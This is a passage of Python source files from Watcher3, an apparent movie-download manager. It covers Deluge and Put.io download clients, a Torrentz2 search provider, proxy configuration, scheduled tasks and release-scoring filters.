return {'response': True, 'torrentfile': response['result']}
else:
return {'response': False, 'error': response['error']}
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e:
logging.error('Delugeweb download_torrent_from_url', exc_info=True)
return {'response': False, 'error': str(e)}
def _get_download_dir(url):
global command_id
logging.debug('Getting default download dir from Deluge Web UI.')
command = {'method': 'core.get_config_value',
'params': ['download_location'],
'id': command_id
}
command_id += 1
post_data = json.dumps(command)
headers['cookie'] = cookie
try:
response = Url.open(url, post_data=post_data, headers=headers)
response = json.loads(response.text)
return response['result']
except Exception as e:
logging.error('delugeweb get_download_dir', exc_info=True)
return {'response': False, 'error': str(e)}
def _login(url, password):
global command_id
global cookie
logging.info('Logging in to Deluge Web UI.')
command = {'method': 'auth.login',
'params': [password],
'id': command_id
}
command_id += 1
post_data = json.dumps(command)
try:
response = Url.open(url, post_data=post_data, headers=headers)
cookie = response.headers.get('Set-Cookie')
if cookie is None:
return 'Incorrect password.'
body = json.loads(response.text)
if body['error'] is None:
return True
else:
return response.msg
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e:
logging.error('DelugeWeb test_connection', exc_info=True)
return '{}.'.format(e)
def cancel_download(downloadid):
global command_id
logging.info('Cancelling download {} in Deluge Web UI'.format(downloadid))
conf = core.CONFIG['Downloader']['Torrent']['DelugeWeb']
host = conf['host']
port = conf['port']
url = '{}:{}/json'.format(host, port)
if cookie is None:
_login(url, conf['pass'])
command = {'method': 'core.remove_torrent',
'params': [downloadid.lower(), True],
'id': command_id
}
command_id += 1
post_data = json.dumps(command)
headers['cookie'] = cookie
try:
response = Url.open(url, post_data=post_data, headers=headers)
response = json.loads(response.text)
return response['result']
except Exception as e:
logging.error('delugeweb cancel_download', exc_info=True)
return {'response': False, 'error': str(e)}
```
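Every call in this module follows the same Deluge Web JSON-RPC shape: POST a `{'method', 'params', 'id'}` envelope and read `{'result', 'error', 'id'}` back. A standalone sketch of that envelope, using `requests` instead of the module's `Url` helper; the host, port, and password below are placeholders:

```python
import json
import requests

def deluge_call(method, params, url='http://localhost:8112/json', session=None):
    # One JSON-RPC request; Deluge tracks auth with a session cookie,
    # which requests.Session keeps for us after auth.login succeeds.
    s = session or requests.Session()
    headers = {'Content-Type': 'application/json', 'User-Agent': 'Watcher'}
    body = json.dumps({'method': method, 'params': params, 'id': 0})
    return s.post(url, data=body, headers=headers).json(), s

# resp, s = deluge_call('auth.login', ['deluge'])       # placeholder password
# resp, _ = deluge_call('web.connected', [], session=s)
```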
#### File: core/downloaders/PutIO.py
```python
import logging
import core
import json
import os
from core.helpers import Url
logging = logging.getLogger(__name__)
url_base = "https://api.put.io/v2/{}?oauth_token={}"
def requires_oauth(func):
''' Decorator to check if oauthtoken exists before calling actual method
'''
def decor(*args, **kwargs):
if not core.CONFIG['Downloader']['Torrent']['PutIO']['oauthtoken']:
logging.debug('Cannot execute Put.IO method -- no OAuth Token in config.')
return {'response': False, 'error': 'No OAuth Token. Create OAuth token on Put.io and enter in settings.'}
return func(*args, **kwargs)
return decor
def test_connection(data):
''' Tests connectivity to Put.IO
data: dict of Put.IO server information
Return True on success or str error message on failure
'''
logging.info('Testing connection to Put.IO.')
if not core.CONFIG['Downloader']['Torrent']['PutIO']['oauthtoken']:
logging.debug('Cannot execute Put.IO method -- no OAuth Token in config.')
return 'No Application Token. Create Application token and enter in settings.'
response = Url.open(url_base.format('account/info', core.CONFIG['Downloader']['Torrent']['PutIO']['oauthtoken']))
if response.status_code != 200:
return '{}: {}'.format(response.status_code, response.reason)
response = json.loads(response.text)
if response['status'] != 'OK':
logging.debug('Cannot connect to Put.IO: {}'.format(response['error_message']))
return response['error_message']
else:
return True
@requires_oauth
def add_torrent(data):
''' Adds torrent or magnet to Put.IO
data: dict of torrent/magnet information
Adds torrents to /default/path/<category>
Returns dict {'response': True, 'downloadid': 'id'}
{'response': False', 'error': 'exception'}
'''
conf = core.CONFIG['Downloader']['Torrent']['PutIO']
url = url_base.format('transfers/add', conf['oauthtoken'])
post_data = {'url': data['torrentfile']}
if conf['directory']:
post_data['save_parent_id'] = conf['directory']
if conf['postprocessingenabled']:
post_data['callback_url'] = '{}/postprocessing/putio_process?apikey={}'.format(conf['externaladdress'], core.CONFIG['Server']['apikey'])
try:
response = Url.open(url, post_data=post_data)
except Exception as e:
logging.warning('Cannot send download to Put.io', exc_info=True)
return {'response': False, 'error': str(e)}
if response.status_code != 200:
return {'response': False, 'error': '{}: {}'.format(response.status_code, response.reason)}
try:
response = json.loads(response.text)
downloadid = response['transfer']['id']
except Exception as e:
logging.warning('Unexpected response from Put.io', exc_info=True)
return {'response': False, 'error': 'Invalid JSON response from Put.IO'}
return {'response': True, 'downloadid': downloadid}
@requires_oauth
def cancel_download(downloadid):
''' Cancels download in client
downloadid: int download id
Returns bool
'''
conf = core.CONFIG['Downloader']['Torrent']['PutIO']
url = url_base.format('transfers/cancel', conf['oauthtoken'])
try:
response = Url.open(url, post_data={'id': downloadid})
except Exception as e:
logging.warning('Unable to cancel Put.io download.', exc_info=True)
return {'response': False, 'error': str(e)}
try:
if json.loads(response.text).get('status') == 'OK':
return True
else:
logging.warning('Unable to cancel Put.io download: {}'.format(response))
return False
except Exception as e:
logging.warning('Unable to cancel Put.io download', exc_info=True)
return False
@requires_oauth
def download(_id):
''' Gets link to file from Put.IO
_id (str/int): ID to download, can be file or dir
Downloads all files in putio dir
Returns dict
'''
conf = core.CONFIG['Downloader']['Torrent']['PutIO']
try:
response = Url.open(url_base.format('files/{}'.format(_id), conf['oauthtoken']))
except Exception as e:
return {'response': False, 'error': str(e)}
try:
response = json.loads(response.text)
f_data = response['file']
except Exception as e:
return {'response': False, 'error': 'Invalid json response from Put.io'}
if f_data['content_type'] == 'application/x-directory':
file_list = _read_dir(f_data['id'], conf['oauthtoken'])
else:
file_list = [f_data]
download_dir = os.path.join(conf['downloaddirectory'], f_data['name'])
if not os.path.exists(download_dir):
try:
os.makedirs(download_dir)
except Exception as e:
logging.error('Cannot create download dir', exc_info=True)
return {'response': False, 'error': 'Cannot create download dir. {}'.format(str(e))}
else:
logging.warning('Download dir exists, existing files may be overwritten.')
download_results = []
for i in file_list:
download_results.append(_download_file(i, download_dir, conf['oauthtoken']))
logging.info('Download from Put.io finished:')
logging.info(json.dumps(download_results, indent=2))
return {'response': True, 'files': download_results, 'path': download_dir}
@requires_oauth
def delete(file_id):
''' Deletes file from Put.IO
file_id (str): Put.IO id # for file or folder
Returns bool
'''
logging.info('Deleting file {} on Put.IO'.format(file_id))
conf = core.CONFIG['Downloader']['Torrent']['PutIO']
url = url_base.format('files/delete', conf['oauthtoken'])
try:
response = Url.open(url, post_data={'file_ids': file_id})
except Exception as e:
logging.warning('Could not delete files on Put.io', exc_info=True)
return False
try:
response = json.loads(response.text)
except Exception as e:
logging.warning('Unexpected response from Put.IO', exc_info=True)
return False
return response.get('status') == 'OK'
def _download_file(f_data, directory, token):
''' Downloads file to local dir
f_data (dict): Putio file metadata
directory (str): Path in which to save file
token (str): oauth token
Downloads file to local dir
Returns dict
'''
try:
response = Url.open(url_base.format('files/{}/download'.format(f_data['id']), token), stream=True)
except Exception as e:
logging.error('Unable to download file from Put.io', exc_info=True)
return {'success': False, 'name': f_data['name'], 'error': str(e)}
target_file = os.path.join(directory, f_data['name'])
try:
with open(target_file, 'wb') as f:
for chunk in response.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
except Exception as e:
return {'success': False, 'name': f_data['name'], 'error': str(e)}
return {'success': True, 'name': f_data['name'], 'location': target_file}
def _read_dir(dir_id, token):
''' Recursively reads dir for all files
dir_id (str/int): Put.io directory #
Returns list of dicts
'''
files = []
try:
response = Url.open(url_base.format('files/list', token) + '&parent_id={}'.format(dir_id))
except Exception as e:
logging.warning('Unable to read files on Put.io', exc_info=True)
return []
try:
contents = json.loads(response.text)['files']
except Exception as e:
logging.warning('Unexpected response from Put.io')
return []
for i in contents:
if i['content_type'] == 'application/x-directory':
files += _read_dir(i['id'], token)
else:
files.append(i)
return files
```
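The `requires_oauth` decorator above is a config-guard pattern: short-circuit with the module's ajax-style error dict instead of failing mid-call. A generic form of the same idea, illustrative only; `requires_config`, `getter`, and `error` are made-up names:

```python
import functools

def requires_config(getter, error):
    ''' Build a decorator that returns an ajax-style error dict
    when getter() is falsy, otherwise calls the wrapped function. '''
    def wrap(func):
        @functools.wraps(func)
        def decor(*args, **kwargs):
            if not getter():
                return {'response': False, 'error': error}
            return func(*args, **kwargs)
        return decor
    return wrap
```

`requires_oauth` is this pattern specialized to the Put.IO OAuth token lookup.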
#### File: providers/torrent_modules/torrentz2.py
```python
import core
import logging
from core.helpers import Url
from xml.etree.cElementTree import fromstring
from xmljson import yahoo
logging = logging.getLogger(__name__)
def search(imdbid, term):
proxy_enabled = core.CONFIG['Server']['Proxy']['enabled']
logging.info('Performing backlog search on Torrentz2 for {}.'.format(imdbid))
url = 'https://www.torrentz2.eu/feed?f={}'.format(term)
try:
if proxy_enabled and core.proxy.whitelist('https://www.torrentz2.eu') is True:
response = Url.open(url, proxy_bypass=True).text
else:
response = Url.open(url).text
if response:
return _parse(response, imdbid)
else:
return []
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e:
logging.error('Torrentz2 search failed.', exc_info=True)
return []
def get_rss():
proxy_enabled = core.CONFIG['Server']['Proxy']['enabled']
logging.info('Fetching latest RSS from Torrentz2.')
url = 'https://www.torrentz2.eu/feed?f=movies'
try:
if proxy_enabled and core.proxy.whitelist('https://www.torrentz2.eu') is True:
response = Url.open(url, proxy_bypass=True).text
else:
response = Url.open(url).text
if response:
return _parse(response, None)
else:
return []
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e:
logging.error('Torrentz2 RSS fetch failed.', exc_info=True)
return []
def _parse(xml, imdbid):
logging.info('Parsing Torrentz2 results.')
try:
items = yahoo.data(fromstring(xml))['rss']['channel']['item']
except Exception as e:
logging.error('Unexpected XML format from Torrentz2.', exc_info=True)
return []
results = []
for i in items:
result = {}
try:
desc = i['description'].split(' ')
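# Assumed description layout, inferred from the indexing below:
# desc[1] = size value, desc[2] = unit ('MB' or 'GB'),
# desc[4] = seeder count, desc[-1] = info hash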
hash_ = desc[-1]
m = (1024 ** 2) if desc[2] == 'MB' else (1024 ** 3)
result['score'] = 0
result['size'] = int(desc[1]) * m
result['status'] = 'Available'
result['pubdate'] = None
result['title'] = i['title']
result['imdbid'] = imdbid
result['indexer'] = 'Torrentz2'
result['info_link'] = i['link']
result['torrentfile'] = core.providers.torrent.magnet(hash_)
result['guid'] = hash_
result['type'] = 'magnet'
result['downloadid'] = None
result['seeders'] = int(desc[4])
result['download_client'] = None
result['freeleech'] = 0
results.append(result)
except Exception as e:
logging.error('Error parsing Torrentz2 XML.', exc_info=True)
continue
logging.info('Found {} results from Torrentz2.'.format(len(results)))
return results
```
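A worked example of the size arithmetic in `_parse`; the exact feed wording here is an assumption, only the field positions match the code:

```python
desc = 'today 1400 MB seeds 25 hash abcdef0123456789'.split(' ')
m = (1024 ** 2) if desc[2] == 'MB' else (1024 ** 3)
size = int(desc[1]) * m   # 1400 * 1048576 = 1468006400 bytes
seeders = int(desc[4])    # 25
info_hash = desc[-1]      # 'abcdef0123456789'
```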
#### File: Watcher3/core/proxy.py
```python
import urllib.request
import core
import logging
from core.helpers import Url
logging = logging.getLogger(__name__)
default_socket = urllib.request.socket.socket
bypass_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
proxy_socket = urllib.request.socket.socket
on = False
def create():
''' Starts proxy connection
Sets global on to True
Does not return
'''
global on
if not core.CONFIG['Server']['Proxy']['enabled']:
return
logging.info('Creating proxy connection.')
host = core.CONFIG['Server']['Proxy']['host']
port = core.CONFIG['Server']['Proxy']['port']
user = core.CONFIG['Server']['Proxy']['user'] or None
password = core.CONFIG['Server']['Proxy']['pass'] or None
if core.CONFIG['Server']['Proxy']['type'] == 'socks5':
logging.info('Creating socket for SOCKS5 proxy at {}:{}'.format(host, port))
if user and password:
addr = 'socks5://{}:{}@{}:{}'.format(user, password, host, port)
else:
addr = 'socks5://{}:{}'.format(host, port)
proxies = {'http': addr, 'https': addr}
Url.proxies = proxies
on = True
elif core.CONFIG['Server']['Proxy']['type'] == 'socks4':
logging.info('Creating socket for SOCKS4 proxy at {}:{}'.format(host, port))
if user and password:
addr = 'socks4://{}:{}@{}:{}'.format(user, password, host, port)
else:
addr = 'socks4://{}:{}'.format(host, port)
proxies = {'http': addr, 'https': addr}
Url.proxies = proxies
on = True
elif core.CONFIG['Server']['Proxy']['type'] == 'http(s)':
logging.info('Creating HTTP(S) proxy at {}:{}'.format(host, port))
protocol = host.split(':')[0]
proxies = {}
if user and password:
url = '{}:{}@{}:{}'.format(user, password, host, port)
else:
url = '{}:{}'.format(host, port)
proxies['http'] = url
if protocol == 'https':
proxies['https'] = url
else:
logging.warning('HTTP-only proxy. HTTPS traffic will not be tunneled through proxy.')
Url.proxies = proxies
on = True
else:
logging.warning('Invalid proxy type {}'.format(core.CONFIG['Server']['Proxy']['type']))
return
def destroy():
''' Ends proxy connection
Sets global on to False
Does not return
'''
global on
if on:
logging.info('Closing proxy connection.')
Url.proxies = None
on = False
return
else:
return
def whitelist(url):
''' Checks if url is in whitelist
url (str): url to check against whitelist
Returns bool
'''
whitelist = core.CONFIG['Server']['Proxy']['whitelist'].split(',')
if whitelist == ['']:
return False
for i in whitelist:
if url.startswith(i.strip()):
logging.info('{} in proxy whitelist, will bypass proxy connection.'.format(url))
return True
else:
continue
return False
def bypass(request):
    ''' Temporarily turns off proxy for single request.
request (object): urllib.request request object
Restores the default urllib.request socket and uses the default opener to send request.
When finished restores the proxy socket. If using an http/s proxy the socket is
restored to the original, so it never changes anyway.
Should always be inside a try/except block just like any url request.
Returns object urllib.request response
'''
urllib.request.socket.socket = default_socket
response = bypass_opener.open(request)
result = response.read().decode('utf-8')
response.close()
urllib.request.socket.socket = proxy_socket
return result
```
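whitelist() above is a plain prefix match against a comma-separated config string. A self-contained sketch of the same logic; the sample whitelist value is hypothetical.

```python
def in_whitelist(url, whitelist_config):
    """Return True if url starts with any comma-separated whitelist entry."""
    entries = whitelist_config.split(',')
    if entries == ['']:  # empty config string means nothing is whitelisted
        return False
    return any(url.startswith(entry.strip()) for entry in entries)

# Hypothetical config value:
wl = 'https://www.torrentz2.eu, https://api.example.com'
print(in_whitelist('https://www.torrentz2.eu/feed?f=movies', wl))  # True
print(in_whitelist('https://other.example.org/rss', wl))           # False
```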
#### File: Watcher3/core/scheduler.py
```python
import datetime
import logging
import cherrypy
import core
import os
import time
import hashlib
from core import searcher, postprocessing
from core.rss import imdb, popularmovies
from lib.cherrypyscheduler import SchedulerPlugin
from core import trakt
from core.library import Metadata, Manage
logging = logging.getLogger(__name__)
pp = postprocessing.Postprocessing()
search = searcher
def create_plugin():
''' Creates plugin instance, adds tasks, and subscribes to cherrypy.engine
Does not return
'''
logging.info('Initializing scheduler plugin.')
core.scheduler_plugin = SchedulerPlugin(cherrypy.engine, record_handler=record_handler)
AutoSearch.create()
AutoUpdateCheck.create()
ImdbRssSync.create()
MetadataUpdate.create()
PopularMoviesSync.create()
PostProcessingScan.create()
TraktSync.create()
FileScan.create()
core.scheduler_plugin.subscribe()
class record_handler(object):
@staticmethod
def read():
return {i['name']: {'last_execution': i['last_execution']} for i in core.sql.dump('TASKS')}
@staticmethod
def write(name, le):
if core.sql.row_exists('TASKS', name=name):
core.sql.update('TASKS', 'last_execution', le, 'name', name)
else:
core.sql.write('TASKS', {'last_execution': le, 'name': name})
return
class PostProcessingScan(object):
''' Scheduled task to automatically scan directory for movie to process '''
@staticmethod
def create():
conf = core.CONFIG['Postprocessing']['Scanner']
interval = conf['interval'] * 60
now = datetime.datetime.today()
hr = now.hour
        minute = now.minute + conf['interval']
SchedulerPlugin.ScheduledTask(hr, minute, interval, PostProcessingScan.scan_directory, auto_start=conf['enabled'], name='PostProcessing Scan')
return
@staticmethod
def scan_directory():
''' Method to scan directory for movies to process '''
conf = core.CONFIG['Postprocessing']['Scanner']
d = conf['directory']
logging.info('Scanning {} for movies to process.'.format(d))
minsize = core.CONFIG['Postprocessing']['Scanner']['minsize'] * 1048576
files = []
if conf['newfilesonly']:
t = core.scheduler_plugin.record.get('PostProcessing Scan', {}).get('last_execution')
if not t:
logging.warning('Unable to scan directory, last scan timestamp unknown.')
return
le = datetime.datetime.strptime(t, '%Y-%m-%d %H:%M:%S')
threshold = time.mktime(le.timetuple())
            logging.info('Scanning for new files only (last scan: {}).'.format(le))
for i in os.listdir(d):
f = os.path.join(d, i)
if os.path.isfile(f) and os.path.getmtime(f) > threshold and os.path.getsize(f) > minsize:
files.append(f)
elif os.path.isdir(f) and os.path.getmtime(f) > threshold:
files.append(f)
else:
for i in os.listdir(d):
f = os.path.join(d, i)
if os.path.isfile(f) and os.path.getsize(f) > minsize:
files.append(f)
elif os.path.isdir(f):
files.append(f)
if files == []:
logging.info('No new files found in directory scan.')
return
for i in files:
while i[-1] in ('\\', '/'):
i = i[:-1]
fname = os.path.basename(i)
logging.info('Processing {}.'.format(i))
r = core.sql.get_single_search_result('title', fname)
if r:
logging.info('Found match for {} in releases: {}.'.format(fname, r['title']))
else:
r['guid'] = 'postprocessing{}'.format(hashlib.md5(fname.encode('ascii', errors='ignore')).hexdigest()).lower()
logging.info('Unable to find match in database for {}, release cannot be marked as Finished.'.format(fname))
d = {'apikey': core.CONFIG['Server']['apikey'],
'mode': 'complete',
'path': i,
'guid': r.get('guid') or '',
'downloadid': ''
}
pp.default(**d)
class AutoSearch(object):
''' Scheduled task to automatically run search/snatch methods '''
@staticmethod
def create():
interval = core.CONFIG['Search']['rsssyncfrequency'] * 60
now = datetime.datetime.today()
hr = now.hour
min = now.minute + core.CONFIG['Search']['rsssyncfrequency']
SchedulerPlugin.ScheduledTask(hr, min, interval, search.search_all, auto_start=True, name='Movie Search')
class MetadataUpdate(object):
''' Scheduled task to automatically run metadata updater '''
@staticmethod
def create():
interval = 72 * 60 * 60 # 72 hours
now = datetime.datetime.today()
hr = now.hour
min = now.minute
SchedulerPlugin.ScheduledTask(hr, min, interval, MetadataUpdate.metadata_update, auto_start=True, name='Metadata Update')
return
@staticmethod
def metadata_update():
''' Updates metadata for library
If movie's theatrical release is more than a year ago it is ignored.
Checks movies with a missing 'media_release_date' field. By the time
this field is filled all other fields should be populated.
'''
logging.info('Updating library metadata.')
movies = core.sql.get_user_movies()
cutoff = datetime.datetime.today() - datetime.timedelta(days=365)
u = []
for i in movies:
if i['release_date'] and datetime.datetime.strptime(i['release_date'], '%Y-%m-%d') < cutoff:
continue
if not i['media_release_date'] and i['status'] not in ('Finished', 'Disabled'):
u.append(i)
if not u:
return
logging.info('Updating metadata for: {}.'.format(', '.join([i['title'] for i in u])))
for i in u:
Metadata.update(i.get('imdbid'), tmdbid=i.get('tmdbid'), force_poster=False)
return
class AutoUpdateCheck(object):
''' Scheduled task to automatically check git for updates and install '''
@staticmethod
def create():
interval = core.CONFIG['Server']['checkupdatefrequency'] * 3600
now = datetime.datetime.today()
hr = now.hour
min = now.minute + (core.CONFIG['Server']['checkupdatefrequency'] * 60)
if now.second > 30:
min += 1
if core.CONFIG['Server']['checkupdates']:
auto_start = True
else:
auto_start = False
SchedulerPlugin.ScheduledTask(hr, min, interval, AutoUpdateCheck.update_check, auto_start=auto_start, name='Update Checker')
return
@staticmethod
def update_check(install=True):
''' Checks for any available updates
install (bool): install updates if found
Setting 'install' for False will ignore user's config for update installation
If 'install' is True, user config must also allow automatic updates
Creates notification if updates are available.
Returns dict from core.updater.update_check():
{'status': 'error', 'error': <error> }
{'status': 'behind', 'behind_count': #, 'local_hash': 'abcdefg', 'new_hash': 'bcdefgh'}
{'status': 'current'}
'''
return core.updater.update_check(install=install)
class ImdbRssSync(object):
''' Scheduled task to automatically sync IMDB watchlists '''
@staticmethod
def create():
interval = core.CONFIG['Search']['Watchlists']['imdbfrequency'] * 60
now = datetime.datetime.today()
hr = now.hour
min = now.minute + core.CONFIG['Search']['Watchlists']['imdbfrequency']
if core.CONFIG['Search']['Watchlists']['imdbsync']:
auto_start = True
else:
auto_start = False
SchedulerPlugin.ScheduledTask(hr, min, interval, imdb.sync, auto_start=auto_start, name='IMDB Sync')
return
class PopularMoviesSync(object):
''' Scheduled task to automatically sync PopularMovies list '''
@staticmethod
def create():
interval = 24 * 3600
hr = core.CONFIG['Search']['Watchlists']['popularmovieshour']
min = core.CONFIG['Search']['Watchlists']['popularmoviesmin']
if core.CONFIG['Search']['Watchlists']['popularmoviessync']:
auto_start = True
else:
auto_start = False
SchedulerPlugin.ScheduledTask(hr, min, interval, popularmovies.sync_feed, auto_start=auto_start, name='PopularMovies Sync')
return
class TraktSync(object):
''' Scheduled task to automatically sync selected Trakt lists '''
@staticmethod
def create():
interval = core.CONFIG['Search']['Watchlists']['traktfrequency'] * 60
now = datetime.datetime.today()
hr = now.hour
min = now.minute + core.CONFIG['Search']['Watchlists']['traktfrequency']
if core.CONFIG['Search']['Watchlists']['traktsync']:
if any(core.CONFIG['Search']['Watchlists']['Traktlists'].keys()):
auto_start = True
else:
logging.warning('Trakt sync enabled but no lists are enabled.')
auto_start = False
else:
auto_start = False
SchedulerPlugin.ScheduledTask(hr, min, interval, trakt.sync, auto_start=auto_start, name='Trakt Sync')
return
class FileScan(object):
''' Scheduled task to automatically sync selected Trakt lists '''
@staticmethod
def create():
interval = 24 * 3600
hr = core.CONFIG['System']['FileManagement']['scanmissinghour']
min = core.CONFIG['System']['FileManagement']['scanmissingmin']
auto_start = core.CONFIG['System']['FileManagement']['scanmissingfiles']
SchedulerPlugin.ScheduledTask(hr, min, interval, Manage.scanmissingfiles, auto_start=auto_start, name='Missing Files Scan')
return
```
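Each create() above hands SchedulerPlugin.ScheduledTask an hour/minute anchor plus an interval in seconds; tasks meant to first fire one interval after startup add the interval (in minutes) to the current minute, so the minute value can exceed 59. A minimal sketch of how such an anchor could be normalized into a concrete first run, assuming datetime-style overflow handling (the real plugin may do this differently):

```python
import datetime

def first_run(hour, minute):
    """Normalize an hour/minute anchor (minute may exceed 59, as in the
    create() methods above) into the next concrete run time."""
    now = datetime.datetime.today()
    anchor = now.replace(hour=hour % 24, minute=0, second=0, microsecond=0)
    anchor += datetime.timedelta(minutes=minute)  # absorbs minute overflow
    if anchor < now:
        anchor += datetime.timedelta(days=1)      # roll to tomorrow if already past
    return anchor

# e.g. a task created at 10:45 with a 30-minute sync frequency:
print(first_run(10, 45 + 30))  # first execution at 11:15 today
```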
#### File: Watcher3/core/searchresults.py
```python
import logging
import datetime
from base64 import b16encode
import core
from core.helpers import Url
import json
logging = logging.getLogger(__name__)
def score(releases, imdbid=None, imported=False):
''' Scores and filters scene releases
releases (list): dicts of release metadata to score
imdbid (str): imdb identification number <optional -default None>
    imported (bool): indicate if search result is a faked import <optional -default False>
If imported is True imdbid can be ignored. Otherwise imdbid is required.
If imported, uses modified 'base' quality profile so releases
cannot be filtered out.
Iterates over the list and filters movies based on Words.
    Scores movie based on resolution priority, title match, and
    preferred words.
    Word groups are split into a list of lists:
[['word'], ['word2', 'word3'], 'word4']
Adds 'score' key to each dict in releases and applies score.
Returns list of result dicts
'''
if len(releases) == 0:
logging.info('No releases to score.')
return releases
logging.info('Scoring {} releases.'.format(len(releases)))
if imdbid is None and imported is False:
logging.warning('Imdbid required if result is not library import.')
return releases
year = None
if imported:
logging.debug('Releases are of origin "Import", using custom default quality profile.')
titles = []
check_size = False
movie_details = {'year': '\n'}
filters = {'requiredwords': '', 'preferredwords': '', 'ignoredwords': ''}
quality = import_quality()
else:
movie_details = core.sql.get_movie_details('imdbid', imdbid)
quality_profile = movie_details['quality']
logging.debug('Scoring based on quality profile {}'.format(quality_profile))
check_size = True
year = movie_details.get('year')
if quality_profile in core.CONFIG['Quality']['Profiles']:
quality = core.CONFIG['Quality']['Profiles'][quality_profile]
else:
quality = core.CONFIG['Quality']['Profiles'][core.config.default_profile()]
filters = json.loads(movie_details['filters'])
sources = quality['Sources']
required_groups = [i.split('&') for i in (quality['requiredwords'] + ',' + filters['requiredwords']).lower().replace(' ', '').split(',') if i != '']
preferred_groups = [i.split('&') for i in (quality['preferredwords'] + ',' + filters['preferredwords']).lower().replace(' ', '').split(',') if i != '']
ignored_groups = [i.split('&') for i in (quality['ignoredwords'] + ',' + filters['ignoredwords']).lower().replace(' ', '').split(',') if i != '']
# Begin scoring and filtering
reset(releases)
if ignored_groups and ignored_groups != ['']:
releases = remove_ignored(releases, ignored_groups)
if required_groups and required_groups != ['']:
releases = keep_required(releases, required_groups)
if core.CONFIG['Search']['retention'] > 0 and any(i['type'] == 'nzb' for i in releases):
releases = retention_check(releases)
if any(i['type'] in ('torrent', 'magnet') for i in releases):
if core.CONFIG['Search']['mintorrentseeds'] > 0:
releases = seed_check(releases)
if core.CONFIG['Search']['freeleechpoints'] > 0:
releases = freeleech(releases)
releases = score_sources(releases, sources, check_size=check_size)
if quality['scoretitle']:
titles = [movie_details.get('title')]
if movie_details.get('alternative_titles'):
titles += movie_details['alternative_titles'].split(',')
releases = fuzzy_title(releases, titles, year=year)
if preferred_groups and preferred_groups != ['']:
releases = score_preferred(releases, preferred_groups)
logging.info('Finished scoring releases.')
return releases
def reset(releases):
''' Sets all result's scores to 0
releases (dict): scene release metadata to score
returns dict
'''
logging.debug('Resetting release scores to 0.')
for i, d in enumerate(releases):
releases[i]['score'] = 0
def remove_ignored(releases, group_list):
''' Remove releases with ignored groups of 'words'
releases (list[dict]): scene release metadata to score and filter
group_list (list[list[str]]): forbidden groups of words
group_list must be formatted as a list of lists ie:
[['word1'], ['word2', 'word3']]
Iterates through releases and removes every entry that contains any
group of words in group_list
Returns list[dict]
'''
keep = []
logging.info('Filtering Ignored Words.')
for r in releases:
if r['type'] == 'import' and r not in keep:
keep.append(r)
continue
cond = False
for word_group in group_list:
if all(word in r['title'].lower() for word in word_group):
logging.debug('{} found in {}, removing from releases.'.format(word_group, r['title']))
cond = True
break
if cond is False and r not in keep:
keep.append(r)
logging.info('Keeping {} releases.'.format(len(keep)))
return keep
def keep_required(releases, group_list):
''' Remove releases without required groups of 'words'
releases (list[dict]): scene release metadata to score and filter
group_list (list[list[str]]): required groups of words
group_list must be formatted as a list of lists ie:
[['word1'], ['word2', 'word3']]
Iterates through releases and removes every entry that does not
contain any group of words in group_list
Returns list[dict]
'''
keep = []
logging.info('Filtering Required Words.')
logging.debug('Required Words: {}'.format(str(group_list)))
for r in releases:
if r['type'] == 'import' and r not in keep:
keep.append(r)
continue
for word_group in group_list:
if all(word in r['title'].lower() for word in word_group) and r not in keep:
logging.debug('{} found in {}, keeping this search result.'.format(word_group, r['title']))
keep.append(r)
break
else:
continue
logging.info('Keeping {} releases.'.format(len(keep)))
return keep
def retention_check(releases):
''' Remove releases older than 'retention' days
releases (list[dict]): scene release metadata to score and filter
retention (int): days of retention limit
Iterates through releases and removes any nzb entry that was
published more than 'retention' days ago
returns list[dict]
'''
today = datetime.datetime.today()
logging.info('Checking retention [threshold = {} days].'.format(core.CONFIG['Search']['retention']))
keep = []
for result in releases:
if result['type'] == 'nzb':
pubdate = datetime.datetime.strptime(result['pubdate'], '%d %b %Y')
age = (today - pubdate).days
if age < core.CONFIG['Search']['retention']:
keep.append(result)
else:
logging.debug('{} published {} days ago, removing search result.'.format(result['title'], age))
else:
keep.append(result)
logging.info('Keeping {} releases.'.format(len(keep)))
return keep
def seed_check(releases):
''' Remove any torrents with fewer than 'seeds' seeders
releases (list[dict]): scene release metadata to score and filter
Gets required seeds from core.CONFIG
Returns list[dict]
'''
logging.info('Checking torrent seeds.')
keep = []
for result in releases:
if result['type'] in ('torrent', 'magnet'):
if int(result['seeders']) >= core.CONFIG['Search']['mintorrentseeds']:
keep.append(result)
else:
logging.debug('{} has {} seeds, removing search result.'.format(result['title'], result['seeders']))
else:
keep.append(result)
logging.info('Keeping {} releases.'.format(len(keep)))
return keep
def freeleech(releases):
''' Adds points to freeleech torrents
releases (list[dict]): scene release metadata to score and filter
Returns list[dict]
'''
points = core.CONFIG['Search']['freeleechpoints']
logging.info('Adding Freeleech points.')
for res in releases:
if res['type'] in ('magnet', 'torrent') and res['freeleech'] == 1:
logging.debug('Adding {} Freeleech points to {}.'.format(points, res['title']))
res['score'] += points
return releases
def score_preferred(releases, group_list):
''' Increase score for each group of 'words' match
releases (list[dict]): scene release metadata to score and filter
group_list (list): preferred groups of words
group_list must be formatted as a list of lists ie:
[['word1'], ['word2', 'word3']]
Iterates through releases and adds 10 points to every
entry for each word group it contains
Returns list[dict]
'''
logging.info('Scoring Preferred Words.')
if not group_list or group_list == ['']:
return
for r in releases:
for word_group in group_list:
if all(word in r['title'].lower() for word in word_group):
logging.debug('{} found in {}, adding 10 points.'.format(word_group, r['title']))
r['score'] += 10
else:
continue
return releases
def fuzzy_title(releases, titles, year='\n'):
''' Score and remove releases based on title match
releases (list[dict]): scene release metadata to score and filter
titles (list): titles to match against
year (str): year of movie release <optional -default '\n'>
If titles is an empty list every result is treated as a perfect match
Matches releases based on release_title.split(year)[0]. If year is not passed,
matches on '\n', which will include the entire string.
Iterates through releases and removes any entry that does not
fuzzy match 'title' > 70.
Adds fuzzy_score / 20 points to ['score']
Returns list[dict]
'''
logging.info('Checking title match.')
keep = []
if titles == [] or titles == [None]:
logging.debug('No titles available to compare, scoring all as perfect match.')
for result in releases:
result['score'] += 20
keep.append(result)
else:
for result in releases:
if result['type'] == 'import' and result not in keep:
                logging.debug('{} is an Import, scoring as a perfect match.'.format(result['title']))
result['score'] += 20
keep.append(result)
continue
rel_title_ss = result['title'].split(year)[0]
logging.debug('Comparing release substring {} with titles {}.'.format(rel_title_ss, titles))
